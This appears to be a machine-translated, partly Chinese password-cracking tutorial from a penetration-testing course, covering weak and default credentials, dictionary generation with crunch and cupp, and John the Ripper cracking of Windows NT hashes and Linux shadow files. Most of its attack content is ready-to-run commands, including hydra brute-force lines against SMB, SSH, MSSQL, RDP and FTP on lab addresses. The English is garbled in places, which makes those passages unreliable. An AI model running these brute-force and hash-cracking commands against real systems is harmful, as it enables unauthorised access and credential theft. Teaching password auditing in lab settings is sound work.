Article Directory
The first chapter password security threat
Section Password Security Overview
Many places have a user name (account number) and password (password) as the authentication mode, password (password) it means that access. Password (password) into the equivalent of house keys, and when others have a key to enter your home, think about your security, your finances, your privacy, fear of it. Such as website background, database, server, PC, QQ, E-mail and so on.
Section Password Security Situation
弱口令
类似于123456、654321、admin123 等这样常见的弱密码。
默认口令
很多应用或者系统都存在默认口令。比如phpstudy 的mysql 数据库默认账密[root/root],Tomcat 管理控制台默认账密[tomcat/tomcat]等。
明文传输
比如HTTP、FTP、TELNET 等服务,在网络中传输的数据流都是明文的,包括口令认证信息等。这样的服务,有被嗅探的风险。
Chapter hack
Section online hack
Secret accounts, require authentication
用户名未知,密码未知
用户名已知,密码未知
用户名未知,密码已知
The use of hydra
----
-l 指定一个用户名
-p 指定一个密码
-P 指定密码字典
-L 指定用户名字典
-vV 显示爆破细节
-o 保存爆破结果
-f 找到正确的密码就停止爆破
-e
n null
s same
r 反向
-t 线程
----
Section II Offline hack
Process ciphertext back into plaintext.
Section brute force
暴力破解Is the use of all possible characters have to set a password, to try to crack. This is the most primitive, brutal crack method, based on computing power, if we can bear from time cost, it will eventually burst out password.
The following table is generated depending on the size of the space code bits.
| character set | The number of passwords | Password space |
|---|---|---|
| [0-9] | 8th | 10^8=100000000 |
| [0-9][a-z] | 8th | 36^8=2821109907456 |
| [0-9][a-z] | 1-8 place | ?? |
[crunch 1 8 abcdefghijklmnopqrstuvwxyz0123456789]
Section IV dictionary attack
If by reasonable conditions, screening or filtering out some of the contents of the whole character combinations, it will significantly reduce the cost of blasting.
We screened password combination into a specific dictionary.
In blasting the password dictionary it is also possible, but doing so may miss the real password.
Password dictionary is broadly divided into the following categories:
-
Dictionary weak passwords
such as 123456, admin and other such default passwords or weak passwords. -
Social workers dictionary
people set passwords, they often order to facilitate memory, content and password combination will and personal information, such as the common password combination "name + date of birth."
[zhangsan1992]
social workers dictionary more targeted, accurate rate is relatively high.
We can generate a password dictionary based on personal information.
可以使用cupp 工具
但是cupp 是国外人开发的
------
apt-get update
apt-get install cupp
cupp -i
------
[zhangsan|ajest|19920701|dnsec|123]
- Character Set Dictionary
if you can determine the character set of the password, it will greatly reduce the cost of blasting.
Section V briefly dictionary
子域名字典
默认账号密码字典
文件路径字典
日志文件
Web 目录
常用变量名字典
常用文件名字典
弱口令字典
Chapter Three windows password cracking
Section windows password remote blasting
[hydra -l administrator -P ../dic/pwd.dic 172.16.132.163 smb]
Section windows cracked accounts hash value
除了可以从远程爆破windows 密码,我们还可以在本地破解windows 密码。
本地windows 账户破解主要有两种方式。
@ 从内存中读取windows 密码
We can read Zhuanghu password from windows system memory with getpass directly.
@ Windows hash value to crack
hashdump
Section windows hash value required to break a total of two steps.
First, we use the tool QuarksPwDump read (export) windows account password hash values, and then use the john tool to crack.
----
john win2k8.hash --format=NT --wordlist=/root/dic/winPass.dic
john win2k8.hash --show --format=NT
----
Chapter IV linux password cracking
linux password cracking, can be divided into local and remote crack crack.
Remote crack is mainly blasting ssh service, is online password attacks.
Local crack need to get the linux shadow files, crack the hash value, belonging to the offline password attacks.
Section crack SSH service
We use the hydra attack hack ssh service, hydra attack has been automatically integrated in kali virtual machine. Commands following
[hydra -l root -P ... / dic / pwd.dic 172.16.132.160 ssh]
Section local shadow file to crack
我们可以使用john 工具,破解shadow 密码文件。
john 也是自动集成在kali 中。john 破解的时候也需要准备一个字典。
[john shadow]
Chapter V network service password cracking
In penetration tests, we also have a password audit services.
Section password crack MSSQL
In this study, it is necessary to build a SQL server2000 service manager, enter the following command after opening kali virtual machine:
[hydra -l sa -P /root/dic/test_pwd.dic 10.10.20.87 mssql -vV]
Section RDP crack passwords
[hydra -l administrator -P /root/dic/test_pwd.dic 10.10.20.75 rdp -vV]
Section III crack FTP password
[hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 10.10.20.81 ftp -vV]
